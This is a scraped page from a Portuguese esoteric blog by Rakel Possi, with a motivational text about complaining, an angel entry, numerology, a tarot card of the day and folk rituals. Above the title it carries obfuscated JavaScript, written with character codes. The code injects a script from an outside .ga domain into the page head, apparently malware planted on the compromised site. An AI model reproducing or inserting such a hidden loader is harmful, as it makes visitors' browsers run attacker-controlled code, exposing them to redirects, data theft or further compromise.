Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); VEJA EM ANJO CABALíSTICO QUEM NOS PROTEGE DOS FALSOS E MENTIROSOS. | Rakel Possi

VEJA EM ANJO CABALíSTICO QUEM NOS PROTEGE DOS FALSOS E MENTIROSOS.

Propaganda

Este contenido también puede ser leído en: Español

-FAÇA UM CLIQUE AQUI E CADASTRE-SE PARA RECEBER MEU BOLETIM DIÁRIO!

 

 

 

 

 

 

PARA SUAS PERGUNTAS GRATUITAS AO TAROT FAÇA UM CLIK  AQUI

  Veja o SORTEADO DA SEMANA:  

 

De 20 a 29 de novembro: E.A.M. – São Vicente – SP Brasil



 

LUA MINGUANTE

 

 

 

 Olá, meus amigos! 
Quanto tempo se perde reclamando! Não acha? Não!?  Pois então faça isto: ande sempre com um caderninho e vai marcando todas as vezes que interrompe o que está fazendo para reclamar. Ficará surpreso! Nós não fazemos idéia de quanta energia gastamos fazendo coisas que não levam a nada! Reclamar é uma delas. Cada um de nós tem uma quantidade de energia que deve ser alimentada, reposta, transmutada, para que sempre tenhamos nosso depósito cheio e assim poder usar. Mas se a gastamos de um modo indiscriminado, ou pouco inteligente, ficaremos sem! É o que acontece quando começamos a nos sentir cansados, irritados, nervosos, aparentemente sem motivo. Fazer uso inteligente da nossa carga energética significa usá-la de modo a que sempre estejamos bem dispostos para fazer todas as atividades diárias. Reclamar é uma das maneiras de gastar inadequadamente essa energia. Se reclama do tempo, do sol e da provável chuva que virá. Há gente queixando-se dos vizinhos, da TV e de muito mais! Mas continuam no mesmo lugar, com as mesmas pessoas, repetindo sempre tudo. Reclamar ou queixar-se não leva a nada porque são atividades sem objetivos. Qual é a sua intenção quando se queixa? Que alguém tenha pena de você? O que procura ao reclamar de tudo? Ninguém gosta de alguém que passa a vida de um modo tão negativo. As pessoas fogem de quem não tem energia do bem. Se o que procura é o amor das pessoas não o conseguirá queixando-se ou se fazendo de vítima. E não me diga que não busca ser amado! Afinal creio que estou me comunicando com gente da Terra, pelo menos pelo site, e todos nós queremos ser amados. Ao tentar mostrar um aspecto tão negativo da vida, ou dos outros, apenas faz com que sua negatividade fique aparente. Ocupe o tempo com coisas produtivas, há tanta coisa para se fazer no Planeta! A Terra está passando por um momento de transição difícil, engaje-se em movimentos sérios e abra a mente de todos. Com certeza tem um cantinho para todos nós em algum grupo. Faça coisas, mostre seu poder de ação, PARE de somente reclamar. Isto não é construtivo. É desgastante! Pense! Você é a sua própria usina. Se gerar energia positiva receberá a mesma de volta. A gente recebe o que oferece, nem mais nem menos. Portanto, de você depende iluminar a vida com mais força ou não. Ih, está reclamando?! Não gostou?! Mexa-se então! Faça do seu modo, talvez seja muito melhor do que o meu! Com todo amor, da sua amiga, Rakel Possi
.

 

ANJO CABALÍSTICO

VEHUEL Deus grande e elevado
Coro dos Principados–  Príncipe Haniel
QUALIDADES: nos protege contra os mentirosos, hipócritas e falsos.
O Gênio contrário torna as pessoas egoístas e hipócritas.
Salmo 144 vers 03: Grande é o Senhor, e muito digno de ser louvado; e a sua grandeza é insondável. Rezar das  16:00h às 16:20h com vela: verde ou prata e incenso de manjericão.

 

 SONHOS   Sonhou com 

EMAGRECER: ver alguém ou você mesmo, emagrecer, é sempre um bom presságio.
Veja mais em SONHOS

NUMEROLOGIA O número do dia
09 de dezembro de 2009 – 9+1+2+2+9= 23/5

Número 5: Podem chegar noticias de longe que servirão de ajuda no futuro próximo. Não se iludam com promessas muito grandes e fantasiosas. Quem lida com dinheiro deve se concentrar muito hoje. 
Veja mais em NUMEROLOGIA

 

 

 

 

TAROT  A carta do dia

 RAINHA DE ESPADAS: Uma rainha que está sentada num trono diferente e com uma espada na mão que lhe permite separar o verdadeiro do falso. Neste dia, a experiência do passado poderá ser muito útil. Mesmo com forças para enfrentar o presente e ver um futuro esperançoso, lembrar do passado será fundamental. Uma carta que traz muita proteção espiritual, mas mostrando que a solidão é necessária para se tomar decisões importantes.   A imagem pertence ao Terra Tarot 

 FAÇA SUA PERGUNTA GRATUITA AO TARÔ EM    RAKEL RESPONDE 
SEMANALMENTE É SORTEADA UMA PERGUNTA.

 

 GRANDE FRATERNIDADE BRANCA A cor de hoje é BRANCO 
MESTRE SERAPIS BEY 
Arcanjo: GABRIEL  (foto)    
Complemento Divino
: ESPERANÇA
Elohin: CLARIDADE    Complemento Divino: ASTRÉA

Na vida de todas as pessoas há épocas em que a solução de algo depende de uma ação rápida. Para a mente não ficar confusa e decidir corretamente deve manter-se sob os efeitos do Raio Branco da Pureza. Assim a mente estará dentro de um Foco de Luz  da Direção Interior que projetará o caminho a ser seguido para que se consiga a calma e clareza requeridas para a solução bem sucedida.  

MANTRA:
EU SOU O PODER DO RAIO BRANCO DESPERTANDO-ME PARA A LUZ. EU SOU!

Velabranca  
Incenso: 
rosas brancas   
Pedra
quartzo branco. 

Veja mais em Grande Fraternidade Branca

 

 

 

 

DICAS MÁGICAS 

– Ritual de purificação: acenda incenso de arruda, escreva seu nome 7 vezes num papel branco e coloque por cima uma vela pequena branca e um copo com água do lado. Num outro papel escreva tudo o que já não quer mais na sua vida e coloque dentro da água. Ao terminar a vela, queime o papel e coloque as cinzas dentro do copo. Deixe três dias em casa e jogue tudo fora (menos o copo) em água corrente, pedindo aos elementais da natureza da água que eliminem tudo isso de você.


– Se está com falta de dinheiro, pegue 7 doces brancos e coloque-os sobre uma mesa em forma de círculo. Acenda no meio uma vela branca com um papel embaixo aonde deverá escrever: Acabar minha falta de dinheiro para sempre. Ao terminar a vela distribua os doces entre sete mendigos e o papel leve a um jardim e enterre para que os elementais da terra transmutem suas faltas e lhe tragam a abundância.

– Traga a energia dos anjos para perto de você e sua família: distribua cristais e flores pela casa e sinos dos ventos que façam barulho com o vento.

Sobre o autor

Rakel Possi

Psicóloga e Practitioner em PNL. Autora de diversos livros, ela assumiu a missão de preparar e ajudar pessoas e organizações se adaptarem melhor ao momento do universo. A competência com foco no desenvolvimento humano e ecológico é o seu forte. /// En español: Psicóloga y Practitioner en PNL. Autora de diversos libros, asumió la misión de preparar, y ayudar, personas y organizaciones a adaptarse mejor al momento del universo. La competencia con foco en el desarrollo humano y ecológico es su fuerte.

CONTATO RAKEL POSSI

 

WhatsApp - Rakel Possi

Celular - WhatsApp

+55 (13) 991511707

 


 

Email - Rakel Possi

E-mail

[email protected]

 


 

Messenger - Rakel Possi

Messenger - Facebook

Click para enviar mensagem

 

Facebook Rakel Possi

Instagram Rakel Possi